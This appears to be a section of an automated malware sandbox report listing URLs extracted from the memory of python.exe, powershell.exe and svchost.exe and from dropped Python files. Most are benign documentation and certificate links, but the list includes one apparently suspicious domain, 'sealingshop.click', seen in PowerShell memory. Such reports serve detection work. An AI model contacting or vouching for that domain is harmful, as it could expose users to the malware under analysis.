Source: python.exe, 00000012.00000003.3177055022.0000012D525FC000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3176942722.0000012D51E7B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3176106124.0000012D51E75000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3177018352.0000012D525FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bugs.python.org/issue12029
Source: python.exe, 00000012.00000003.3176942722.0000012D51E7B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3176106124.0000012D51E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bugs.python.org/issue13585
Source: python.exe, 00000012.00000003.3167939396.0000012D51FC9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3174257995.0000012D51FCA000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3170974101.0000012D51DDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bugs.python.org/issue14396.
Source: python.exe, 00000012.00000003.3167939396.0000012D51FC9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3174257995.0000012D51FCA000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3170974101.0000012D51DDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bugs.python.org/issue15756
Source: python.exe, 00000012.00000003.3176942722.0000012D51E7B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3176106124.0000012D51E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bugs.python.org/issue19404
Source: python.exe, 00000012.00000003.3106850979.0000012D51569000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3106666922.0000012D5159F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bugs.python.org/issue19619
Source: python.exe, 00000012.00000003.3108601415.0000012D515A9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3108466132.0000012D51E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bugs.python.org/issue5845#msg198636
Source: python.exe, 00000012.00000003.3160906762.0000012D5234A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3162088539.0000012D5234A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bugs.python.org/issue874900
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: python.exe, 00000012.00000003.3193841068.0000012D527FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.17.2713&rep=rep1&type=pdf
Source: python.exe, 00000012.00000003.3126988654.0000012D5200A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3124982099.0000012D51F66000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3123841346.0000012D52009000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3124982099.0000012D52009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/259174/
Source: python.exe, 00000012.00000003.3128414255.0000012D515A8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3129722938.0000012D515C4000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3128414255.0000012D5153C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallest
Source: svchost.exe, 00000006.00000002.3306468306.0000019792600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: python.exe, 00000012.00000003.3152248846.0000012D51534000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3142508753.0000012D51534000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/
Source: python.exe, 00000012.00000003.3203297988.0000012D52AF6000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203373400.0000012D527F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
Source: test_DES.py.16.dr	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-17/800-17.pdf
Source: python.exe, 00000012.00000003.3204009322.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202197981.0000012D520C0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3199473048.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3198800218.0000012D520C0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202908008.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205916188.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, _mode_ccm.cpython-39.pyc.16.dr	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
Source: python.exe, 00000012.00000003.3206731275.0000012D51FA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: python.exe, 00000012.00000003.3197427310.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3194209339.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3200218590.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp8
Source: python.exe, 00000012.00000003.3208481139.0000012D5281C000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3193617569.0000012D51E72000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3184215377.0000012D522FC000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3184589390.0000012D5281C000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3149335189.0000012D51E93000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202808995.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3183856910.0000012D51E84000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3184964705.0000012D51E93000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3140767395.0000012D51E84000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3193027478.0000012D51E75000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205834938.0000012D51E85000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3183529265.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3172553485.0000012D51E96000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3176942722.0000012D51E7B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3178555237.0000012D51E8F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3186450240.0000012D51FCF000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3200347262.0000012D51E93000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3195780720.0000012D5200B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202856613.0000012D51E84000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3184119287.0000012D51DFA000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3200492946.0000012D52013000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: test_ARC4.py.16.dr	String found in binary or memory: http://cypherpunks.venona.com/date/1994/09/msg00420.html
Source: pyparsing.py.16.dr	String found in binary or memory: http://docs.python.org/3/library/pprint.html#pprint.pprint
Source: svchost.exe, 00000006.00000002.3307031936.0000019792663000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3306468306.0000019792600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/
Source: svchost.exe, 00000006.00000002.3307031936.0000019792663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80i
Source: svchost.exe, 00000006.00000003.2140110358.00000197924D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: python.exe, 00000012.00000003.3160906762.0000012D5234A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3162088539.0000012D5234A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3174013075.0000012D51DA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/j2se/1.5.0/docs/api/java/util/concurrent/
Source: decoder.cpython-39.pyc.1294207632560.18.dr	String found in binary or memory: http://json.org
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0F364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221477899.0000019E1DC38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221477899.0000019E1DB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: test_DES.py.16.dr	String found in binary or memory: http://people.csail.mit.edu/rivest/Destest.txt
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0F2DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: python.exe, 00000012.00000003.3177289327.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3182698577.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3179926783.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3178047469.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://php.net/manual/en/function.version-compare.php
Source: pyparsing.py.16.dr	String found in binary or memory: http://pyparsing.wikispaces.com
Source: chromecache_2304.7.dr	String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0DA81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0F060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sealingshop.click
Source: python.exe, 00000012.00000003.3160906762.0000012D5234A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3162088539.0000012D5234A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3174013075.0000012D51DA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sourceware.org/pthreads-win32/manual/pthread_barrier_init.html
Source: _IntegerNative.py.16.dr	String found in binary or memory: http://stackoverflow.com/questions/15390807/integer-square-root-in-python
Source: pyparsing.py.16.dr	String found in binary or memory: http://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular-
Source: python.exe, 00000012.00000003.3204009322.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3199473048.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3200891462.0000012D525FB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3195780720.0000012D5200B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3200492946.0000012D52013000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3200764131.0000012D527F8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3197427310.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202908008.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3197427310.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3208317071.0000012D525D9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3194209339.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205543689.0000012D525FA000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3200218590.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3194209339.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, _mode_openpgp.cpython-39.pyc.1294202742704.18.dr, _mode_openpgp.py.16.dr	String found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: _abnf.cpython-312.pyc.16.dr	String found in binary or memory: http://tools.ietf.org/html/rfc5234
Source: python.exe, 00000012.00000003.3202808995.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205543689.0000012D525B9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51EFF000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204326932.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204715281.0000012D51DB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5297
Source: python.exe, 00000012.00000003.3202808995.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204009322.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205543689.0000012D525B9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202908008.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51EFF000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204326932.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204715281.0000012D51DB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: _abnf.cpython-312.pyc.16.dr	String found in binary or memory: http://tools.ietf.org/html/rfc6455#section-5.2
Source: python.exe, 00000012.00000003.3205834938.0000012D51E85000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205543689.0000012D525B9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205306513.0000012D523B3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3207924474.0000012D523B3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205916188.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0F0C9000.00000004.00000800.00020000.00000000.sdmp, remote_connection.py.16.dr, webdriver.py0.16.dr, _http.py.16.dr, key_actions.py.16.dr, __init__.py.16.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0F2DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2227000571.0000019E25B6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: chromecache_2326.7.dr	String found in binary or memory: http://www.broofa.com
Source: python.exe, 00000012.00000003.3134323043.0000012D527E1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3131208113.0000012D523A4000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134521754.0000012D51F0F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3131208113.0000012D5233A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134361343.0000012D523A5000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134427839.0000012D51DA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: python.exe, 00000012.00000003.3202808995.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204009322.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202856613.0000012D51E84000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202908008.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203805160.0000012D523B3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3206731275.0000012D51FE3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203168656.0000012D51E90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: python.exe, 00000012.00000003.3126988654.0000012D5200A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3124982099.0000012D51F66000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3123841346.0000012D52009000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3124982099.0000012D52009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
Source: _overlapped.pyd.16.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: python.exe, 00000012.00000003.3177289327.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3182698577.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3179926783.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3178047469.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.egenix.com/files/python/platform.py
Source: python.exe, 00000012.00000003.3177289327.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3182698577.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3179926783.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3178047469.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.geocities.com/rick_lively/MANUALS/ENV/MSWIN/PROCESSI.HTM
Source: python.exe, 00000012.00000003.3126988654.0000012D5200A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3124982099.0000012D51F66000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3123841346.0000012D52009000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3124982099.0000012D52009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
Source: python.exe, 00000012.00000003.3131208113.0000012D523A4000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3135012694.0000012D523A4000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3131208113.0000012D5233A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134361343.0000012D523A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: python.exe, 00000012.00000003.3134323043.0000012D527E1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3131208113.0000012D523A4000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134521754.0000012D51F0F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3131208113.0000012D5233A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134361343.0000012D523A5000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134427839.0000012D51DA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: redirector_asynch.py.16.dr, guidemo.py.16.dr	String found in binary or memory: http://www.python.org
Source: request.cpython-39.pyc.1294208279984.18.dr	String found in binary or memory: http://www.python.org/
Source: python.exe, 00000012.00000003.3167939396.0000012D51FC9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3178737305.0000012D51FC9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3170974101.0000012D51DDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.python.org/2.4/license
Source: weakref.py.16.dr	String found in binary or memory: http://www.python.org/dev/peps/pep-0205/
Source: python.exe, 00000012.00000003.3122769698.0000012D52309000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3123681580.0000012D522F9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3124729236.0000012D5153C000.00000004.00000020.00020000.00000000.sdmp, functools.cpython-39.pyc.1294162032944.18.dr	String found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
Source: python.exe, 00000012.00000003.3205834938.0000012D51E85000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205543689.0000012D525B9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205306513.0000012D523B3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3207924474.0000012D523B3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205916188.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: python.exe, 00000012.00000003.3202808995.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205543689.0000012D525B9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51EFF000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204326932.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3206731275.0000012D52029000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205916188.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204715281.0000012D51DB5000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0DA81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: chromecache_2304.7.dr	String found in binary or memory: https://apis.google.com
Source: chromecache_2335.7.dr	String found in binary or memory: https://apis.google.com/js/api.js
Source: python.exe, 00000012.00000003.3170974101.0000012D51DDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.python.org/issue25942
Source: python.exe, 00000012.00000003.3177055022.0000012D525FC000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3176942722.0000012D51E7B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3181198862.0000012D525FC000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3181124946.0000012D525FB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3176106124.0000012D51E75000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3177018352.0000012D525FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.python.org/issue29302
Source: python.exe, 00000012.00000003.3108601415.0000012D515A9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3108466132.0000012D51E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.python.org/issue29585
Source: python.exe, 00000012.00000003.3131208113.0000012D523A4000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3131208113.0000012D5233A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134361343.0000012D523A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.python.org/msg352381
Source: webdriver.py0.16.dr	String found in binary or memory: https://chromedevtools.github.io/devtools-protocol/
Source: powershell.exe, 00000005.00000002.2221477899.0000019E1DB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2221477899.0000019E1DB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2221477899.0000019E1DB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: chromecache_2326.7.dr	String found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
Source: _http.py.16.dr	String found in binary or memory: https://docs.python.org/3.8/library/ssl.html?highlight=sslkeylogfile#context-creation
Source: _http.py.16.dr	String found in binary or memory: https://docs.python.org/3.8/library/ssl.html?highlight=sslkeylogfile#ssl.SSLContext.keylog_filename
Source: python.exe, 00000012.00000003.3197427310.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3197427310.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3194209339.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3200218590.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3194209339.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, _mode_openpgp.py.16.dr	String found in binary or memory: https://eprint.iacr.org/2005/033)
Source: svchost.exe, 00000006.00000003.2140110358.0000019792543000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.2140110358.00000197924D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0F2DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: _http.py.16.dr	String found in binary or memory: https://github.com/liris/websocket-client/commit/b96a2e8fa765753e82eea531adb19716b52ca3ca#commitcomm
Source: dde.pyd.16.dr	String found in binary or memory: https://github.com/mhammond/pywin32
Source: auth.py1.16.dr	String found in binary or memory: https://github.com/psf/requests/issues/3772
Source: python.exe, 00000012.00000003.3149656939.0000012D52364000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3148921372.0000012D5234B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3151020216.0000012D51DA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/pull/7160#discussion_r195405230
Source: __init__.cpython-39.pyc.1294205290512.18.dr	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2680
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0E6B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: sessions.cpython-39.pyc.1294209086640.18.dr	String found in binary or memory: https://httpbin.org/get
Source: chromecache_2326.7.dr	String found in binary or memory: https://lens.google.com
Source: chromecache_2326.7.dr	String found in binary or memory: https://lensfrontend-pa.clients6.google.com/v1/crupload
Source: chromecache_2326.7.dr	String found in binary or memory: https://lensfrontend-pa.clients6.google.com/v1/gsessionid
Source: request.cpython-39.pyc.1294208279984.18.dr	String found in binary or memory: https://mahler:8092/site-updates.py
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0F364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221477899.0000019E1DC38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221477899.0000019E1DB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
